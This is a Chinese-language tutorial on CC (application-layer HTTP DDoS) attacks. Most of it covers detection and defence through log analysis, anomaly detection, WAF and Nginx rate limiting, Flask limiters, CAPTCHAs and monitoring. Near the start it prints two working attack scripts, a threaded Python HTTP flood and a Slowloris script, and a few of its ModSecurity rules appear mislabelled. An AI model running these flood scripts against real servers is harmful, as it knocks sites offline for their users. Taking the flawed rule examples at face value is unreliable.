什么是CC攻击?
CC攻击(Challenge Collapsar)是一种常见的分布式拒绝服务(DDoS)攻击类型,主要针对Web应用层。攻击者通过控制大量僵尸主机(Botnet)向目标服务器发送大量看似合法的HTTP请求,耗尽服务器资源(如CPU、内存、带宽),导致正常用户无法访问网站。
与传统的DDoS攻击不同,CC攻击的流量特征更隐蔽,因为请求看起来像正常用户行为,这使得识别和防御更具挑战性。
CC攻击的常见类型
1. HTTP Flood攻击
攻击者发送大量HTTP GET或POST请求,消耗服务器资源。
示例代码(模拟攻击流量):
import requests
import threading
import time
def attack(target_url, threads=100):
def send_request():
while True:
try:
response = requests.get(target_url, timeout=5)
print(f"Status: {response.status_code}")
except:
pass
for _ in range(threads):
thread = threading.Thread(target=send_request)
thread.daemon = True
thread.start()
while True:
time.sleep(1)
# 使用示例(仅用于教育目的)
# attack("http://example.com")
2. Slowloris攻击
攻击者建立大量连接但发送极慢的数据,占用服务器连接池。
示例代码(模拟Slowloris攻击):
import socket
import random
import time
def slowloris_attack(target_ip, target_port, connections=200):
sockets = []
for i in range(connections):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target_ip, target_port))
s.send(f"GET / HTTP/1.1\r\nHost: {target_ip}\r\n".encode())
sockets.append(s)
except:
pass
while True:
for s in sockets:
try:
s.send(f"X-a: {random.randint(1, 5000)}\r\n".encode())
except:
sockets.remove(s)
time.sleep(15)
# 使用示例(仅用于教育目的)
# slowloris_attack("192.168.1.100", 80)
3. HTTP POST Flood
攻击者发送大量POST请求,消耗服务器处理能力。
4. 针对特定资源的攻击
攻击者针对消耗资源的特定URL(如登录页面、搜索功能、API接口)进行攻击。
CC攻击的识别方法
1. 流量特征分析
正常流量 vs CC攻击流量对比:
| 特征 | 正常流量 | CC攻击流量 |
|---|---|---|
| 请求频率 | 分散、有规律 | 集中、爆发式 |
| 请求来源 | 分散IP | 集中IP或大量不同IP |
| 请求内容 | 多样化 | 重复或相似 |
| 会话行为 | 有浏览路径 | 直接访问特定页面 |
| 时间分布 | 符合用户作息 | 24小时持续 |
2. 监控指标
关键监控指标:
- 请求速率(RPS):每秒请求数异常增长
- 并发连接数:服务器连接数激增
- CPU/内存使用率:资源占用率飙升
- 响应时间:正常请求响应时间变慢
- 错误率:5xx错误增加
3. 日志分析
Apache/Nginx日志分析示例:
# 查找异常IP(短时间内大量请求)
awk '{print $1}' access.log | sort | uniq -c | sort -nr | head -20
# 查找异常URL(被频繁访问的URL)
awk '{print $7}' access.log | sort | uniq -c | sort -nr | head -20
# 查找异常User-Agent
awk -F'"' '{print $6}' access.log | sort | uniq -c | sort -nr | head -20
# 统计每分钟请求量
awk '{print $4}' access.log | cut -d: -f1,2 | uniq -c
4. 使用工具检测
使用Wireshark分析:
# 过滤HTTP请求
http.request.method == "GET"
# 过滤特定IP的请求
ip.src == 192.168.1.100
# 统计请求频率
Statistics -> HTTP -> Requests
使用tcpdump捕获流量:
# 捕获HTTP流量
tcpdump -i eth0 -w capture.pcap port 80
# 分析捕获的文件
tcpdump -r capture.pcap -nn | grep -E "GET|POST"
5. 机器学习检测
使用Python进行异常检测:
import pandas as pd
from sklearn.ensemble import IsolationForest
import numpy as np
# 模拟日志数据
def generate_log_data():
data = []
for i in range(1000):
# 正常请求
data.append({
'ip': f'192.168.1.{i%255}',
'request_count': np.random.poisson(5),
'request_size': np.random.normal(1024, 200),
'response_time': np.random.normal(0.5, 0.1)
})
# 添加攻击流量
for i in range(100):
data.append({
'ip': f'10.0.0.{i}',
'request_count': np.random.poisson(100),
'request_size': np.random.normal(500, 50),
'response_time': np.random.normal(2.0, 0.5)
})
return pd.DataFrame(data)
# 异常检测
def detect_anomaly(df):
# 特征选择
features = ['request_count', 'request_size', 'response_time']
# 训练孤立森林模型
clf = IsolationForest(contamination=0.1, random_state=42)
clf.fit(df[features])
# 预测异常
df['anomaly'] = clf.predict(df[features])
return df[df['anomaly'] == -1]
# 使用示例
# log_data = generate_log_data()
# anomalies = detect_anomaly(log_data)
# print(f"检测到 {len(anomalies)} 个异常请求")
CC攻击的防范措施
1. Web应用防火墙(WAF)
部署WAF规则示例:
ModSecurity规则示例:
# 限制单个IP的请求频率
SecRule REMOTE_ADDR "@ipMatch 192.168.1.0/24" \
"id:1001,phase:1,pass,nolog,ctl:ruleEngine=On"
# 限制请求速率
SecRule REQUEST_HEADERS:User-Agent "@contains Bot" \
"id:1002,phase:1,pass,log,deny,status:403"
# 限制并发连接数
SecRule REMOTE_ADDR "@ipMatch 192.168.1.100" \
"id:1003,phase:1,pass,log,deny,status:429"
Nginx配置示例:
# 限制请求速率
limit_req_zone $binary_remote_addr zone=one:10m rate=10r/s;
server {
location / {
limit_req zone=one burst=20 nodelay;
proxy_pass http://backend;
}
}
# 限制并发连接数
limit_conn_zone $binary_remote_addr zone=addr:10m;
server {
location / {
limit_conn addr 10;
proxy_pass http://backend;
}
}
2. CDN和云防护服务
使用Cloudflare防护:
// 在Cloudflare Worker中设置防护规则
addEventListener('fetch', event => {
event.respondWith(handleRequest(event.request))
})
async function handleRequest(request) {
const clientIP = request.headers.get('CF-Connecting-IP')
const userAgent = request.headers.get('User-Agent')
// 检查是否为恶意请求
if (isMaliciousRequest(request)) {
return new Response('Access Denied', { status: 403 })
}
return fetch(request)
}
function isMaliciousRequest(request) {
// 实现检测逻辑
return false
}
3. 服务器配置优化
Apache配置示例:
# 限制请求超时
Timeout 30
KeepAliveTimeout 5
# 限制并发连接数
MaxRequestWorkers 150
MinSpareThreads 25
MaxSpareThreads 75
# 限制请求大小
LimitRequestBody 10485760
# 限制请求方法
<LimitExcept GET POST HEAD>
Order deny,allow
Deny from all
</LimitExcept>
Nginx配置示例:
# 限制请求体大小
client_max_body_size 10M;
# 限制请求超时
client_body_timeout 10s;
client_header_timeout 10s;
# 限制并发连接数
worker_connections 1024;
# 限制请求频率
limit_req_zone $binary_remote_addr zone=api:10m rate=1r/s;
location /api/ {
limit_req zone=api burst=5 nodelay;
}
4. 应用层防护
代码示例(Python Flask):
from flask import Flask, request, jsonify
from flask_limiter import Limiter
from flask_limiter.util import get_remote_address
import time
from collections import defaultdict
app = Flask(__name__)
# 限制器配置
limiter = Limiter(
app,
key_func=get_remote_address,
default_limits=["200 per day", "50 per hour"]
)
# 请求频率限制
@app.route('/api/data')
@limiter.limit("10 per minute")
def get_data():
return jsonify({"data": "some data"})
# 自定义请求频率限制
request_counts = defaultdict(list)
@app.route('/api/search')
def search():
client_ip = request.remote_addr
now = time.time()
# 清理旧记录
request_counts[client_ip] = [
t for t in request_counts[client_ip]
if now - t < 60
]
# 检查频率
if len(request_counts[client_ip]) > 10:
return jsonify({"error": "Too many requests"}), 429
request_counts[client_ip].append(now)
# 处理搜索逻辑
query = request.args.get('q', '')
return jsonify({"results": f"Search results for {query}"})
if __name__ == '__main__':
app.run(debug=True)
5. 验证码和人机验证
使用reCAPTCHA示例:
<!DOCTYPE html>
<html>
<head>
<script src="https://www.google.com/recaptcha/api.js" async defer></script>
</head>
<body>
<form action="/submit" method="POST">
<input type="text" name="username" placeholder="用户名">
<input type="password" name="password" placeholder="密码">
<!-- reCAPTCHA v2 -->
<div class="g-recaptcha" data-sitekey="YOUR_SITE_KEY"></div>
<button type="submit">登录</button>
</form>
</body>
</html>
后端验证(Python):
import requests
from flask import request, jsonify
def verify_recaptcha(token):
secret_key = "YOUR_SECRET_KEY"
url = "https://www.google.com/recaptcha/api/siteverify"
payload = {
'secret': secret_key,
'response': token
}
response = requests.post(url, data=payload)
result = response.json()
return result.get('success', False)
@app.route('/submit', methods=['POST'])
def submit():
recaptcha_token = request.form.get('g-recaptcha-response')
if not verify_recaptcha(recaptcha_token):
return jsonify({"error": "CAPTCHA verification failed"}), 400
# 处理表单数据
username = request.form.get('username')
password = request.form.get('password')
return jsonify({"success": True})
6. 负载均衡和自动扩展
使用Nginx作为负载均衡器:
upstream backend {
least_conn;
server 192.168.1.101:80 max_fails=3 fail_timeout=30s;
server 192.168.1.102:80 max_fails=3 fail_timeout=30s;
server 192.168.1.103:80 max_fails=3 fail_timeout=30s;
}
server {
listen 80;
server_name example.com;
location / {
proxy_pass http://backend;
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
# 超时设置
proxy_connect_timeout 5s;
proxy_send_timeout 10s;
proxy_read_timeout 10s;
}
}
7. 监控和告警
使用Prometheus + Grafana监控:
# prometheus.yml 配置
scrape_configs:
- job_name: 'nginx'
static_configs:
- targets: ['localhost:9113']
- job_name: 'node_exporter'
static_configs:
- targets: ['localhost:9100']
自定义监控脚本:
import psutil
import time
import requests
from datetime import datetime
def monitor_server():
while True:
# 获取系统指标
cpu_percent = psutil.cpu_percent(interval=1)
memory_percent = psutil.virtual_memory().percent
disk_usage = psutil.disk_usage('/').percent
# 获取网络连接数
connections = len(psutil.net_connections())
# 获取HTTP请求速率(通过日志分析)
# 这里简化处理,实际应从日志文件读取
request_rate = 100 # 示例值
# 检查异常
if cpu_percent > 80 or memory_percent > 85:
send_alert(f"High resource usage: CPU={cpu_percent}%, Memory={memory_percent}%")
if request_rate > 1000:
send_alert(f"High request rate: {request_rate} RPS")
time.sleep(60)
def send_alert(message):
# 发送告警到Slack、邮件等
print(f"[ALERT] {datetime.now()}: {message}")
# 实际实现中,这里会调用告警接口
if __name__ == "__main__":
monitor_server()
实战案例分析
案例1:电商网站CC攻击防护
场景:某电商网站在促销期间遭受CC攻击,攻击者针对商品详情页和搜索接口。
防护措施:
- 部署WAF:设置规则限制单个IP每分钟最多100次请求
- 启用CDN:使用Cloudflare的DDoS防护
- 缓存优化:对商品详情页进行缓存,减少后端压力
- 限流策略:对搜索接口实施严格的速率限制
- 验证码:在登录和支付页面增加验证码
效果:攻击流量被成功拦截,网站正常运行,转化率未受影响。
案例2:API服务防护
场景:某API服务遭受CC攻击,攻击者针对认证接口。
防护措施:
- API网关:使用Kong或APISIX作为API网关
- 令牌桶算法:实现严格的速率限制
- IP黑名单:自动将异常IP加入黑名单
- 请求签名:要求所有请求必须包含签名
- 熔断机制:当错误率超过阈值时自动熔断
代码示例(API网关限流):
from flask import Flask, request, jsonify
import redis
import time
app = Flask(__name__)
redis_client = redis.Redis(host='localhost', port=6379, db=0)
def rate_limit(key, limit=100, window=60):
"""令牌桶算法限流"""
current = int(time.time())
window_key = f"{key}:{current // window}"
# 获取当前令牌数
tokens = redis_client.get(window_key)
if tokens is None:
tokens = 0
else:
tokens = int(tokens)
if tokens >= limit:
return False
# 增加令牌
redis_client.incr(window_key)
redis_client.expire(window_key, window)
return True
@app.route('/api/login', methods=['POST'])
def login():
client_ip = request.remote_addr
if not rate_limit(f"login:{client_ip}", limit=10, window=60):
return jsonify({"error": "Rate limit exceeded"}), 429
# 处理登录逻辑
username = request.json.get('username')
password = request.json.get('password')
# 验证逻辑...
return jsonify({"success": True})
if __name__ == '__main__':
app.run(debug=True)
最佳实践总结
1. 分层防御策略
- 网络层:使用防火墙、CDN、负载均衡
- 传输层:启用SSL/TLS,使用WAF
- 应用层:实施速率限制、验证码、请求验证
- 数据层:数据库查询优化,连接池管理
2. 监控和响应
- 实时监控:建立完整的监控体系
- 自动化响应:设置自动告警和阻断规则
- 日志分析:定期分析日志,发现异常模式
- 应急响应:制定应急预案,定期演练
3. 持续优化
- 定期评估:定期评估防护策略的有效性
- 更新规则:根据攻击趋势更新防护规则
- 性能测试:定期进行压力测试
- 安全审计:定期进行安全审计和渗透测试
4. 合规和法律
- 遵守法规:确保防护措施符合当地法律法规
- 数据隐私:保护用户隐私,合规收集数据
- 日志保留:按照要求保留安全日志
- 报告义务:及时报告重大安全事件
结论
CC攻击是一种复杂且持续演变的威胁,需要综合性的防护策略。通过结合技术手段、管理措施和持续监控,可以有效识别和防范CC攻击。关键是要建立多层次的防御体系,从网络层到应用层全面防护,同时保持对新攻击手法的警惕和适应能力。
记住,没有绝对的安全,只有相对的安全。持续改进和适应是应对CC攻击的关键。
